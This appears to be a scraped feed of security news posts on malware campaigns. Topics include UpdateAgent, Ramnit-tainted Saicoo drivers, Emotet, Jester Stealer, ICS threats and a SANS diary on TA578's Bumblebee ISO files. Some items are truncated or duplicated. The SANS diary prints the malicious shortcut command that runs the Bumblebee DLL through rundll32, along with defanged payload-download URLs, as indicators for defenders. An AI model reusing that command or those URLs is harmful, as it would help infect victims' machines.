hacking.jpg

Microsoft is warning of an emerging threat targeting internet-connected cryptocurrency wallets, signaling a departure in the use of digital coins in cyberattacks.
The tech giant dubbed the new threat “cryware,” with the attacks resulting in the irreversible theft of virtual currencies by means of fraudulent transfers to an adversary-controlled wallet.
“Cryware are information stealers that

cropped-itsecuritynews.png

Researchers spotted a new variant of the UpdateAgent macOS malware dropper that was employed in attacks in the wild.

Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version is written in Swift and relies on the AWS infrastructure to host its malicious payloads. 

The new variant of the malware supports common dropper features, including some minor system fingerprinting, endpoint registration, and persistence.

“The second stage download and execute the functionality of droppers, in general, represent a risky class of malware that support a number of second-stage attacks — from malware to spyware, to adware.” reads the analysis of the experts.

The experts noticed a surge in adware/malware distributed via the latest variant of the UpdateAgent macOS malware dropper, which was masquerading as PDFCreator. At the time of discovery, the binary had a zero rate detection in VirusTotal and at the time of this writing, the detection rate is 3 out of 60.

UpdateAgent

Upon executing the malware, it connects to a remote server and retrieves a bash script to be executed.

The bash script runs directly from the Swift dropper without being saved on the hard drive.

“The authors of the UpdateAgent malware remain vigilant in keeping it up to date. It is known for having a well-built backend that allows itself to be easily updated, and although we’ve only seen adware families dropped by it, security experts are concerned that there might be other malicious plans for the future with such a well-built infrastructure.” the researchers conclude.

The report also includes indicators of compromise for this threat.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERSVote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, UpdateAgent)

The post Experts spotted a new variant of UpdateAgent macOS malware dropper written in Swift appeared first on Security Affairs.

iphone-off.png

Millions of U.S. government employees and contractors have been issued a secure smart ID card that enables physical access to buildings and controlled spaces, and provides access to government computer networks and systems at the cardholder’s appropriate security level. But many government employees aren’t issued an approved card reader device that lets them use these cards at home or remotely, and so turn to low-cost readers they find online. What could go wrong? Here’s one example.

The post When Your Smart ID Card Reader Comes With Malware appeared first on Security Boulevard.

saicooramnit.png

Millions of U.S. government employees and contractors have been issued a secure smart ID card that enables physical access to buildings and controlled spaces, and provides access to government computer networks and systems at the cardholder’s appropriate security level. But many government employees aren’t issued an approved card reader device that lets them use these cards at home or remotely, and so turn to low-cost readers they find online. What could go wrong? Here’s one example.

A sample Common Access Card (CAC). Image: Cac.mil.

KrebsOnSecurity recently heard from a reader — we’ll call him “Mark” because he wasn’t authorized to speak to the press — who works in IT for a major government defense contractor and was issued a Personal Identity Verification (PIV) government smart card designed for civilian employees. Not having a smart card reader at home and lacking any obvious guidance from his co-workers on how to get one, Mark opted to purchase a $15 reader from Amazon that said it was made to handle U.S. government smart cards.

The USB-based device Mark settled on is the first result that currently comes up one when searches on Amazon.com for “PIV card reader.” The card reader Mark bought was sold by a company called Saicoo, whose sponsored Amazon listing advertises a “DOD Military USB Common Access Card (CAC) Reader” and has more than 11,700 mostly positive ratings.

The Common Access Card (CAC) is the standard identification for active duty uniformed service personnel, selected reserve, DoD civilian employees, and eligible contractor personnel. It is the principal card used to enable physical access to buildings and controlled spaces, and provides access to DoD computer networks and systems.

Mark said when he received the reader and plugged it into his Windows 10 PC, the operating system complained that the device’s hardware drivers weren’t functioning properly. Windows suggested consulting the vendor’s website for newer drivers.

The Saicoo smart card reader that Mark purchased. Image: Amazon.com

So Mark went to the website mentioned on Saicoo’s packaging and found a ZIP file containing drivers for Linux, Mac OS and Windows:

Image: Saicoo

Out of an abundance of caution, Mark submitted Saicoo’s drivers file to Virustotal.com, which simultaneously scans any shared files with more than five dozen antivirus and security products. Virustotal reported that some 43 different security tools detected the Saicoo drivers as malicious. The consensus seems to be that the ZIP file currently harbors a malware threat known as Ramnit, a fairly common but dangerous trojan horse that spreads by appending itself to other files.

Image: Virustotal.com

Ramnit is a well-known and older threat — first surfacing more than a decade ago — but it has evolved over the years and is still employed in more sophisticated data exfiltration attacks. Amazon said in a written statement that it was investigating the reports.

“Seems like a potentially significant national security risk, considering that many end users might have elevated clearance levels who are using PIV cards for secure access,” Mark said.

Mark said he contacted Saicoo about their website serving up malware, and received a response saying the company’s newest hardware did not require any additional drivers. He said Saicoo did not address his concern that the driver package on its website was bundled with malware.

In response to KrebsOnSecurity’s request for comment, Saicoo sent a somewhat less reassuring reply.

“From the details you offered, issue may probably caused by your computer security defense system as it seems not recognized our rarely used driver & detected it as malicious or a virus,” Saicoo’s support team wrote in an email.

“Actually, it’s not carrying any virus as you can trust us, if you have our reader on hand, please just ignore it and continue the installation steps,” the message continued. “When driver installed, this message will vanish out of sight. Don’t worry.”

Saicoo’s response to KrebsOnSecurity.

The trouble with Saicoo’s apparently infected drivers may be little more than a case of a technology company having their site hacked and responding poorly. Will Dormann, a vulnerability analyst at CERT/CC, wrote on Twitter that the executable files (.exe) in the Saicoo drivers ZIP file were not altered by the Ramnit malware — only the included HTML files.

Dormann said it’s bad enough that searching for device drivers online is one of the riskiest activities one can undertake online.

“Doing a web search for drivers is a VERY dangerous (in terms of legit/malicious hit ration) search to perform, based on results of any time I’ve tried to do it,” Dormann added. “Combine that with the apparent due diligence of the vendor outlined here, and well, it ain’t a pretty picture.”

But by all accounts, the potential attack surface here is enormous, as many federal employees clearly will purchase these readers from a myriad of online vendors when the need arises. Saicoo’s product listings, for example, are replete with comments from customers who self-state that they work at a federal agency (and several who reported problems installing drivers).

A thread about Mark’s experience on Twitter generated a strong response from some of my followers, many of whom apparently work for the U.S. government in some capacity and have government-issued CAC or PIV cards.

Two things emerged clearly from that conversation. The first was general confusion about whether the U.S. government has any sort of list of approved vendors. It does. The General Services Administration (GSA), the agency which handles procurement for federal civilian agencies, maintains a list of approved card reader vendors at idmanagement.gov (Saicoo is not on that list). [Thanks to @MetaBiometrics and @shugenja for the link!]

The other theme that ran through the Twitter discussion was the reality that many people find buying off-the-shelf readers more expedient than going through the GSA’s official procurement process, whether it’s because they were never issued one or the reader they were using simply no longer worked or was lost and they needed another one quickly.

“Almost every officer and NCO [non-commissioned officer] I know in the Reserve Component has a CAC reader they bought because they had to get to their DOD email at home and they’ve never been issued a laptop or a CAC reader,” said David Dixon, an Army veteran and author who lives in Northern Virginia. “When your boss tells you to check your email at home and you’re in the National Guard and you live 2 hours from the nearest [non-classified military network installation], what do you think is going to happen?”

Interestingly, anyone asking on Twitter about how to navigate purchasing the right smart card reader and getting it all to work properly is invariably steered toward militarycac.com. The website is maintained by Michael Danberry, a decorated and retired Army veteran who launched the site in 2008 (its text and link-heavy design very much takes one back to that era of the Internet and webpages in general). His site has even been officially recommended by the Army (PDF). Mark shared emails showing Saicoo itself recommends militarycac.com.

Image: Militarycac.com.

“The Army Reserve started using CAC logon in May 2006,” Danberry wrote on his “About” page. “I [once again] became the ‘Go to guy’ for my Army Reserve Center and Minnesota. I thought Why stop there? I could use my website and knowledge of CAC and share it with you.”

Danberry did not respond to requests for an interview — no doubt because he’s busy doing tech support for the federal government. The friendly message on Danberry’s voicemail instructs support-needing callers to leave detailed information about the issue they’re having with CAC/PIV card readers.

Dixon said Danberry has “done more to keep the Army running and connected than all the G6s [Army Chief Information Officers] put together.”

In many ways, Mr. Danberry is the equivalent of that little known software developer whose tiny open-sourced code project ends up becoming widely adopted and eventually folded into the fabric of the Internet.  I wonder if he ever imagined 15 years ago that his website would one day become “critical infrastructure” for Uncle Sam?

phishing-emails-spreading-malware.jpg

merlin_206986674_e61475d7-261f-4e96-9198

data analytics

AV-Comparatives, the independent ISO-certified security software evaluation lab, has released the latest factsheet results from the Business Main-Test Series, which evaluated a range of anti-virus products in business environments. This report is brought in the interim of the full report which will include also a Performance Test and product reviews, which will be released in […]

Der Beitrag AV-Comparatives Releases Factsheet for March-April Enterprise Malware and Real-World Protection Tests erschien zuerst auf AV-Comparatives.

2021 saw a massive surge in detections of malware, adware, and Potentially Unwanted Programs (PUPs). It didn’t matter what the computers were used for or what operating system they ran—across business and home computers, on Windows and on Mac, detections went up, enormously.

Detections of malware on Windows business machines were 143% higher in 2021 than in 2020, and 65% higher on consumer machines.

Windows malware detection totals 2019-2021Windows malware detection totals 2019-2021

Detections of malware, adware, and PUPs on macOS increased almost 220%.

Mac malware, adware and PUP detection totals 2019-2021Mac malware, adware and PUP detection totals 2019-2021

The background to this extraordinary jump in detections is the coronavirus pandemic, so we call this surge in detections the “Covid bounce”.

The Covid bounce

In 2020, the recently-discovered novel coronavirus, and the restrictions put in place to slow its progress, caused trillions of dollars of lost economic activity and a mass migration of knowledge workers from offices to homes.

Almost all forms of business suffered—even illegal ones like cybercrime. Crooks were just as likely to get COVID-19 as anyone else, and the targets they preyed upon changed beyond recognition.

Many businesses wound down or folded, and those that didn’t had to upend their IT infrastructure overnight to support working from home. How people worked, where they worked, the tools they used, and the things they cared about were all in flux.

No wonder then, that in 2020, malware detections on Windows business machines fell 24%.

The effect was not spread evenly across all types of malware though. Detections of Emotet and TrickBot collapsed by 89% and 69% respectively, leading some to speculate that while these highly sophisticated forms of malware were extremely effective at permeating corporate networks they may be poorly adapted to exploit the work-from-home environment.

Meanwhile, detections of hacking tools, information stealers, and other malware that could help criminals better understand the transformation in their victims’ environments, increased considerably.

In 2021, as restrictions lifted gradually around the world, and as organisations and the criminals preying on them adapted to remote and hybrid work, detection numbers climbed precipitously.

And they didn’t simply return to the pre-Covid status quo, they soared past 2019’s numbers. In 2021, the detection numbers for business threats were 85% higher than in 2019, and consumer threat detections were 47% higher.

Cryptocurrency values soared in 2021 and, to nobody’s surprise, detections of malware that mines cryptocurrencies increased more than 300 precent.

Adware, spyware, and worms all displayed an enormous bounce back in 2021, climbing 200%, and detections of email threats showed a considerable “Covid bounce” too. But while the old guard of Emotet and TrickBot remained, they were not the presence of old as several new pretenders jostled for position.

It is impossible to say why detections bounced back so alarmingly last year, but the plain fact is that the world now is not the world of 2019. Events like the coronavirus pandemic have far-reaching effects that go far beyond the immediate, obvious and tragic health consequences, affecting all walks of life, even the security of your servers, laptops, and remote workers.

The pandemic accelerated the transition from a bricks-and-mortar to online existence, and for many businesses and services there is no going back.

After a period of adjustment and uncertainty in 2020, cybercrime seems to have emerged supremely well adapted to this new reality.

You can learn more about the Covid bounce and how it changed the outlook for cyberthreats into 2022 and beyond in the Malwarebytes 2022 Threat Review.

The post How COVID-19 fuelled a surge in malware appeared first on Malwarebytes Labs.

best-practices-open-graph.jpg

Stories from the SOC is a blog series that describes recent real-world security incident investigations conducted and reported by the AT&T SOC analyst team for AT&T Managed Extended Detection and Response customers.

Executive summary

One of the most prevalent threats today, facing both organizations and individuals alike, is the use of ransomware. In 2021, 37% of organizations said they were victims of some type of ransomware attack. Ransomware can render large amounts of important data inaccessible nearly instantly. This makes reacting to potential ransomware events in a timely and accurate manner extremely important. Utilizing an endpoint security tool is critical to  help mitigate these threats. However, it is vital to maintain vigilance and situational awareness when addressing these threats, and not rely solely on one piece of information when performing analysis.

The AT&T Managed Extended Detection and Response (MXDR) analyst team received an alarm stating SentinelOne had detected ransomware on a customer’s asset. The logs suggested the threat had been automatically quarantined, but further analysis suggested something more sinister was afoot. The same malicious executable had been detected on that asset twice before, both times reportedly being automatically quarantined. This type of persistent malware can be an indicator of a deeper infection such as a rootkit. After a more in-depth analysis and collaboration with the customer, the decision was made to quarantine and power off the asset, and replace the asset entirely due to this persistent malware.

Investigation

Initial alarm review

Indicators of Compromise (IOC)

The initial SentinelOne alarm alerted us to an executable ‘mssecsvc.exe’:

IoC persistent malware

The name of the executable as well as the file path is cleverly crafted to imitate a legitimate Windows program.

Expanded investigation

Events search

Searching events for the file hash revealed it had been repeatedly detected on the same asset over the last 2 weeks. In each instance the event log reports the executable being automatically quarantined by SentinelOne.

Persistent malware events

Additionally, a seach in USM Anywhere revealed two previous investigations opened for the same executable on the same asset. In both previous investigations the customer noted SentinelOne had automatically quarantined the file but did not take any further action regarding the asset.

Event deep dive

In the new instance of this alarm the event log reports SentinelOne successfully killed any processes associated with the executable and quarantined the file.

deep dive 1 Deep dive 2

This may lead one to believe there is no longer a threat. But the persistent nature of this file raises more questions than the event log can answer.

Reviewing additional indicators

It is important to not rely on a single piece of information when assessing threats and to go beyond just what is contained in the logs we are given. Utilizing open-source threat intelligence strengthens our analysis and can confirm findings. Virus Total confirmed the file hash was deemed malicious by multiple other vendors.

Persistent malware additional indicators

The executable was also analyzed in JoeSandbox. This revealed the file contained a device path for a binary string ‘FLASHPLAYERUPDATESERVICE.EXE which could be used for kernel mode communication, further hinting at a rootkit.

JoeSandbox

Response

Building the investigation

Despite the event log suggesting the threat had been automatically quarantined, the combination of the repeat occurrence and the findings on open-source threat intel platforms warranted raising an investigation to the customer. The customer was alerted to the additional findings, and it was recommended to remove the asset from the network.

Response for persistent malware

The customer agreed with the initial analysis and suspected something more serious. The analysts then searched through the Deep Visibility logs from SentinelOne to determine the source of the mssecsvc.exe. Deep Visibility logs allow us to follow associated processes in a storyline order. In this case, it appears the ‘mssecsvc.exe’ originated from the same ‘FlashPlayerUpdateService.exe’ we saw in the JoeSandbox analysis. Deep Visibility also showed us that mssecsvc.exe had a Parent Process of wininit.exe, which was likely to be the source of persistence.

customer response to persistent malware

Customer interaction

Another notable feature of USM Anywhere is the ability to take action from one centralized portal. As a result of the investigation, the analysts used the Advanced AlienApp for SentinelOne to place the asset in network quarantine mode and then power it off. An internal ticket was submitted by the customer to have the asset replaced entirely.

Limitations and opportunities

Limitations

A limiting factor for the SOC is our visibility into the customer’s environment as well as what information we are presented in log data. The event logs associated with this alarm suggested there was no longer a threat, as it had been killed and quarantined by SentinelOne. Taking a single instance of information at face value could have led to further damage, both financially and reputationally. This investigation highlighted the importance of thinking outside the log, researching historical investigations, and combining multiple sources of information to improve our analysis.

In our Open-Source Threat Hunting, Quick Heal Security Researchers encountered a banking Trojan named Aberebot capable of stealing…

The post Beware – Banking Trojans using enhanced techniques to spread malware. appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.

In our Open-Source Threat Hunting, Quick Heal Security Researchers encountered a banking Trojan named Aberebot capable of stealing…

The post Beware – Banking Trojans using enhanced techniques to spread malicious malware. appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.

default.jpg

Cisco Talos and Cisco Secure are launching a new video series to fill you in on the latest cybersecurity trends. We’re thrilled to launch our first video in the new Talos Threat Update series, which you can watch above or over at this link, where Martin Lee and Hazel Burton talk about wiper…

[[ This is only the beginning! Please visit the blog for the complete entry ]]

phishing-bitrat-pandora-part-one-hero.jp

FortiGuard Labs discovered a phishing campaign delivering fileless malware to steal sensitive information from a victim’s device. Read our analysis to find out more about how the campaign executes and maintains persistence on the victim’s device.
blogs?d=yIl2AUoC8zA

Check Point Research reports that April has seen a lot of activity from Formbook to Lokibot. This month also saw Spring4Shell make headlines, but it is not yet one of the most exploited vulnerabilities Our latest Global Threat Index for April 2022 reveals that Emotet, an advanced, self-propagating and modular Trojan, is still the most…

The post April 2022’s Most Wanted Malware: A Shake Up in the Index but Emotet is Still on Top appeared first on Check Point Software.

INTRODUCTION:

Identified by Proofpoint as the threat actor behind the Contact Forms campaign, TA578 also appears to be pushing ISO files for Bumblebee malware through thread-hijacked emails.  These threat-hijacked emails either have links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign, or they have password-protected zip attachments.  Either method delivers an ISO file containing files to install Bumblebee malware.

Today’s diary compares two examples of ISO files for Bumblebee malware from Monday 2022-05-09 that appear to be from TA578.


Shown above:  Infection chains from TA578 on Monday 2022-05-09.

INFECTION CHAIN COMPARISON: LINK TO ‘DOCUMENT’ DOWNLOAD PAGE:


Shown above:  TA578 Thread-hijacked email with malicious storage.googleapis.com link.


Shown above:  TA578 ‘document’ download page hosted on storage.googleapis.com URL delivers malicious ISO file for Bumblebee malware.


Shown above:  Contents of downloaded document.iso file.

INFECTION CHAIN COMPARISON: PASSWORD-PROTECTED ZIP ATTACHMENT:


Shown above:  TA578 email with password-protected zip attachment.


Shown above:  Malicious ISO file for Bumblebee malware extracted from password-protected zip attachment.

ISO FILE COMPARISON:

SHA256 hash: 330b01256efe185fc3846b6b1903f61e1582b5a5127b386d0542d7a49894d0c2

File size: 2,883,584 bytes
File name: document.iso
File description: malicious ISO file sent by ‘documents’ download page

SHA256 hash: e9084037805a918e00ac406cf99d7224c6e63f72eca3babc014b34863fb81949

File size: 2,883,584 bytes
File name: invoice_pdf_49.iso
File description: malicious ISO file extracted from password-protected zip attachment

ISO CONTENT COMPARISON:

SHA256 hash: 22e033c76bb1070953325f58caeeb5c346eca830033ffa7238fb1e4196b8a1b9

File size: 1,612 bytes
File name: documents.lnk
File description: Windows shortcut in both document.iso and invoice_pdf_49.iso
Shortcut: %windir%system32rundll32.exe ramest.dll,SjVjlixjPb

SHA256 hash: e6357f7383b160810ad0abb5a73cfc13a17f4b8ea66d6d1c7117dbcbcf1e9e0f

File size: 1,390,592 bytes
File name: ramest.dll
File description: Bumblebee 64-bit DLL in document.iso

SHA256 hash: f398740233f7821184618c6c1b41bc7f41da5f2dbde75bbd2f06fc1db70f9130

File size: 1,3900,80 bytes
File name: ramest.dll
File description: Bumblebee 64-bit DLL in invoice_pdf_49.iso

Note: Both of the above ramest.dll files have the same import hash (imphash) of 66356a654249c4824378b1a70e7cc1e5

SIMILARITIES TO CONTACT FORMS CAMPAIGN:

TA578 ‘document’ download pages are similar to ‘Stolen Images Evidence’ pages used for the Contact Forms campaign.  Both are hosted on storage.googleapis.com pages with appspot.com in the URL.  Both generate traffic to a malicious URL ending in logo.jpg that returns script with base64 text used to generate a malicious ISO file for download.

The following are 4 examples of URLs generated by ‘document’ download pages for malicious ISO files in May 2022:

hxxps://baronrtal[.]com/img/logo.jpg
hxxps://bunadist[.]com/img/logo.jpg
hxxps://omnimature[.]com/img/logo.jpg
hxxps://vorkinal[.]com/img/logo.jpg

The following are 4 examples of URLs generated by ‘Stolen Images Evidence’ pages for malicious ISO files in May 2022:

hxxps://bunadist[.]com/images/logo.jpg
hxxps://curanao[.]com/images/logo.jpg
hxxps://goranism[.]com/images/logo.jpg
hxxps://olodaris[.]com/images/logo.jpg

As seen above, ‘Stolen Images Evidence’ pages generate URLs ending in /images/logo.jpg, while ‘document’ download pages generate URLs ending in /img/logo.jpg.

URLs hosted on storage.googleapis.com for ‘Stolen Images Evidence’ pages end with ?l= or ?h= or similar strings ollowed by a numeric value.  For example, hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fWpa4HT4ck6v6.html?l=827470894993112750 is a URL for a recent ‘Stolen Images Evidence’ page.

URLs hosted on storage.googleapis.com for ‘document’ download pages end in .html.  For example: hxxps://storage.googleapis[.]com/pz3ksj5t45tg4t.appspot.com/q/pub/file/0/filejBWdkst6Ua3s.html is a URL for a recent ‘document’ download page.

FINAL WORDS:

The Contact Forms campaign switches between pushing ISO files for Bumblebee malware, or pushing ISO files for IcedID (Bokbot) malware, and I’ve seen both during the same week.  Since February 2022, TA578 has been noted pushing both families of malware.  And in recent weeks, TA578 has been using thread-hijacked emails to distribute ISO files for Bumblebee malware.  TA578 might also distribute IcedID using the same type of thread-hijacked messages.

While the malware may be different, I occasionally find Cobalt Strike from either Bumblebee or IcedID when testing samples in Active Directory (AD) environments.  Cobalt Strike can lead to ransomware or other malicious activity.

If TA578 activity is caught and stopped in its early stages, potential victims might avoid more serious harm.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In our new threat briefing report, Forescout’s Vedere Labs analyzes an Emotet sample, presents a list of IoCs extracted from the analysis and discusses mitigation.

Emotet is the name of both a cybercrime group and a malware loader it distributes. The group is also known as MUMMY SPIDER, while the malware is also known as Geodo or Heodo. According to CISA, Emotet is among the most costly and destructive malware used against the private and public sectors, with individual incidents costing up to $1 million to remediate. According to Europol, Emotet is the world’s most dangerous malware.

The malware is disseminated through malicious emails that typically have a financial theme, such as receipts and invoices, or follow current events, such as tax season scams and donation requests for refugees. Infection happens when a victim opens a document attached to the email that contains malicious macros that, in turn, execute the malware downloader. After download, Emotet persists on the infected machine, communicates with a C2 server to receive instructions and attempts to spread on the local network.

Emotet started in 2014 as a banking trojan used to steal credentials, but it has evolved through several mutations and additional DLL modules to become a botnet capable of delivering other malware, such as TrickBot or IcedID, and ransomware, such as Ryuk. This capability is so important that Emotet is often considered “infrastructure as a service” for initial access and malware distribution.

The botnet was taken down by police action in January 2021, but the threat actor rebuilt its infrastructure and returned in November 2021. Emotet started adding more bots around January, and the number has been increasing steadily. At its previous peak before the police action, Emotet infected millions of devices. Since its resurgence, there are now approximately 130,000 bots, which can propagate the malware by spamming targets, be used for lateral movement in targeted organizations or be promoted to proxy C2 servers. The number of Emotet infections tripled in March 2022 over the previous month.

Forescout recommends that organizations use the following steps to mitigate risks:

Enforce anti-phishing training to avoid the initial infection via malspam
Disable macro execution whenever possible
Monitor the use of regsvr32 processes on endpoints as detailed in the technical report
Deploy the IoCs shared in the technical report in network detection and threat hunting tools

For more information and technical analysis, read the full report.

Download the Briefing Note

The post Emotet: The Return of the World’s Most Dangerous Malware appeared first on Forescout.

Jester Stealer, a malicious file capable of large amounts of data theft, is on the prowl again. The Ukrainian Computer Emergency Response Team (CERT-UA) has warned of a large distribution campaign abusing a “chemical attack” theme. Receiving an email like this in the invasion-affected regions of Ukraine is likely to cause huge alarm.

From bogus attack warnings to data theft malware

As per Bleeping Computer, the mail reads as follows:

“Today the information was received that chemical weapons will be used at 01.00 at night, the authorities are trying to hide it in order not to panic the population. Urgently get acquainted with the places where chemical weapons will be used and the places of special shelters where we will be safe.

Help us to disseminate the information attached to the document in the letter as much as possible. map of the zone of chemical damage.

We need to save as many lives as possible!”

Source: CERT-UA

Although the mail is being described as phishing, there is no direct request for passwords or logins linked to in the mail itself. Instead, there’s a link to an Excel document which has been booby-trapped with harmful macros.

A rogue file called JesterStealer is downloaded to the victim’s PC and executes when the document is opened with macros enabled. At this point, the device is infected. CERT-UA notes that the infection files are being hosted on “compromised web resources”. When organisations don’t keep their services updated and vulnerabilities patched, this is the unfortunate knock-on effect.

Impact on affected systems

Once infected, the system is at serious risk of data theft. The list of potential target areas includes:

Internet browsersMAIL/FTP/VPN clientsCryptocurrency walletsPassword managersMessengersGame programs

Jester Stealer is also capable of swiping screenshots and stealing network passwords.

There’s some anti virtual machine/debug/sandbox tactics in play to hamper researchers analysing the file. The malware also removes itself once closed, helping attackers evade suspicion from those affected as they may well never realise the malware was present.

Tips for avoiding this attack

Stick to official news sources for breaking information in affected areas. You’re more likely to see a genuine warning on the President’s page, or similar messaging from official sources on Twitter, than from random emails.Think carefully about attachment types in emails. Does it make much sense that a warning like this requires an Excel spreadsheet? Why not just put the full warning in the email? If it’s urgent, breaking information, people need everything in one place. Having to open up websites to download, and open files seems a long-winded and very odd way to accomplish this goal.Macros in Office files have been a long running problem. Microsoft has made several changes to try and minimise the risk of harm. Downloading macros from the internet results in an automatic block with regard to being able to run. Some individuals and organisations will always need macros available to some degree. This is why the “learn more” button will ultimately allow you to enable if you definitely need them.

What Microsoft has to say about enabling macros

Microsoft’s advice for this is very good. Here’s what it suggests in relation to macros:

Were you expecting to receive a file with macros? Never open a file attachment you weren’t expecting, even if it appears to come from somebody you trust. Phishing attacks often appear to come from a person or organization you trust in an effort to get you to open them.Are you being encouraged to enable content by a stranger? A common tactic of attackers is to create some pretense such as cancelling an order or reading a legal document. They’ll have you download a document and try to persuade you to allow macros to run. No legitimate company will make you open an Excel file to cancel an order and you don’t need macros just to read a document in Word.Are you being encouraged to enable content by a pop-up message? If you downloaded the file from a website, you may see pop-ups or other messages encouraging you to enable active content. Those are also common tactics of attackers and should make you suspicious that the file is actually unsafe.

Think carefully about enabling macros from random documents sent your way, and follow the tips above. Rogue mails which do nothing but compromise or damage your computer may make it more difficult to receive genuine alerts, and that’s definitely an additional problem you can do without.

The post “Chemical attack” email warnings deliver Jester Stealer malware appeared first on Malwarebytes Labs.

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware.

And although we are more aware of threats than ever before, a future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, writes Jason Atwell, Principal Advisor of Global Intelligence at Mandiant.

Shortly before Christmas in 2015 the power grid in Ukraine suffered a series of outages that impacted roughly a quarter of a million consumers and lasted several hours.[1] Later, in 2017 the same group used ransomware to shutdown servers all over Ukraine, including at the infamous Chernobyl Nuclear Power Plant.[2] The actor behind this attack was a Russian state-sponsored group known as “Sandworm.” Because of the role this group has played in defining the scope and threat from cyber actors to power grids, cyber professionals and intelligence analysts around the globe have been watching keenly for any evidence of the group’s current activity during the current crisis in Ukraine.

Sandworm might be the most infamous group currently known for ICS malware, or malware that is intended specifically to target industrial control systems (ICS) such as programmable logic controllers (PLCs) or unified architecture (UA) servers. This type of malware, while still relatively rare, is more common now than a decade ago, and is increasingly proven capable of achieving dangerous and widespread effects on targeted networks globally.

Ukraine has had the unfortunate distinction of being the place where one of the most noteworthy incidents involving such malware has occurred, but it is far from the only one, and will not be the last to deal with incidents involving it. As anyone who works in the overlapping fields of cyber and engineering knows, it isn’t necessarily the threats or failures you’ve identified that will hurt you, it might be the ones no one has thought of.

The Russian focus on Ukraine’s power grid in particular, and how it has evolved over time, offers valuable lessons for network defenders and industrial engineers as they prepare grids to be resilient against future attacks of this kind.

Have you read:Water utility attacked by sophisticated timed malwareEuropean water utility attacked by cryptocurrency mining malwareNo green grid without cybersecurity

Exploration of energy sector significance

It is no mistake that most of the discovered ICS malware targets energy, or energy-related, functions and systems. When keeping in mind the intended effects, and the state-sponsored groups behind these capabilities, energy becomes a logical target for ICS malware. Energy plays a critical role in the dynamics of international geopolitics. When nation-states confront one another, the energy sector is often at the center of tensions.

This is because of the critical role energy plays in several key factors, such as internal stability through essential services, economic health due to the huge role oil and gas play in many economies, the effects of compliance that can be achieved when crucial suppliers deny or fail to deliver fuel, and finally it is a rapidly digitizing industry on the forefront of competition between the world’s great powers, making it a fertile ground for testing cyber capabilities in a way that sends a quick and direct message.

Besides Ukraine, Saudi Arabia has experienced cyber attacks directed against its energy sector, ones which were both destructive and highly creative in their methodology. Triton malware, which incidentally is also linked to Russia, was used to attempt to cause physical damage at a Saudi petrochemical company by disabling key safety systems, specifically the hardware and software platform used to coordinate across multiple devices.

This focus on eliminating the monitoring, coordination, and redundancy that is essential to modern safety systems could have made the impact of this attack devastating had it fully succeeded. Despite failing, it is understandable why such an attack could benefit a country like Russia, which was assessed to be behind Triton malware and subsequently sanctioned for its development.[3] Russia is in the top tier of nations that both profit from, and are largely dependent on, the energy market.

In past wars the bombing of oil and gas facilities were priority efforts, in future wars the same effects[4] might be achievable from afar using a network connection and a custom malware kit, helping decrease the risk to the attacker and increasing the speed and scale of destruction.

Discussion of malware functions and effects

One of the most significant recent developments in ICS malware was the proactive detection and mitigation of a campaign designed to use INCONTROLLER malware to target machine automation devices, specifically those able to interact with specific industrial equipment leveraged across multiple industries. The desired goal apparently being to interact with that equipment in such a way as to disable safety features, similar to Triton previously discussed above.[5]

Have you read:HBKU and Iberdrola collaborate on smart grid cybersecurityDOE funnels $12m to enhance US energy systems’ cybersecurity

Future Scenarios

Russia’s attempts to take out critical components of the electrical grid using cyber attacks may have been limited in scope and mostly unsuccessful, especially in terms of Ukraine’s ability to quickly recover, but they do show us where ICS malware and its capabilities are headed in the future. Like many other kinds of malware, ICS malware is increasingly focused on infiltrating the commonalities across systems and networks in order to have the greatest chance of exploitation and success.

That means a focus on widely adopted technology, the coding language used to communicate between them, and the software suites that enable multiple processes. In the future, because malicious actors are increasingly aware of what these critical nodes and common overlays are, attacks will be even more stealthy in how they infiltrate supply chains and achieve effects rapidly, both using our engineering processes against us and taking into account detection and response capabilities.

Mitigation

From an engineering perspective, there are some basic concepts that can help address the rising threat posed by ICS-specific malware. Additionally, the cyber security field is heavily engaged in hardening ICS networks and responding to incidents when they occur. Marrying these parallel efforts is an important part of having a strategic approach to this issue.

First, the earlier in a design process that cyber security can be addressed, the better. A resilient design should include not only redundancies, but ways to check if those redundancies are balancing one another effectively. This eliminates a vector for a bad actor to use safety processes against the system.

Second, operating procedures, either in design or in practice, should include the necessary time and resources to review data and indicators for signs of malicious activity. This includes updates, maintenance, and tests. Malicious activity may not be detectable, even on a secured network, if too much trust is placed in “operations as usual” as an indicator of a secure system.

Sign up to our newsletter and stay informed

Third and final, supply chain issues, in terms of new procurement, upgrades and enhancements, should be addressed as part of the design and build of resilient networks. Reviewing code or hardware for faults or signs of manipulation should be just as important as checking the loads or capacities of more traditional equipment and physical plants. The strongest pipeline or best insulated cable in the world won’t do much good if it’s connected to a compromised piece of network hardware purchased from an entity at odds with the geopolitical stance of the buyer’s host nation or corporate structure. Threat intelligence and past incident case studies can be immensely useful in determining how best to address these three areas for consideration.

Conclusion

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware. This potential attack surface is complex and growing. The good news is we are more aware of threats than ever before, and the resources dedicated to addressing them are maturing and becoming more accessible. A future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, and probably sooner than later, but its actual outcome is largely up to us, not the attacker.

Jason Atwell

About the Author:

Jason Atwell is Principal Advisor of Global Intelligence at Mandiant. Atwell helps oversee the Strategic Intelligence & Government and Global Government Consulting practices. Atwell has over 18 years of experience in cyber and risk intelligence from across the military, government, and commercial sectors.

References

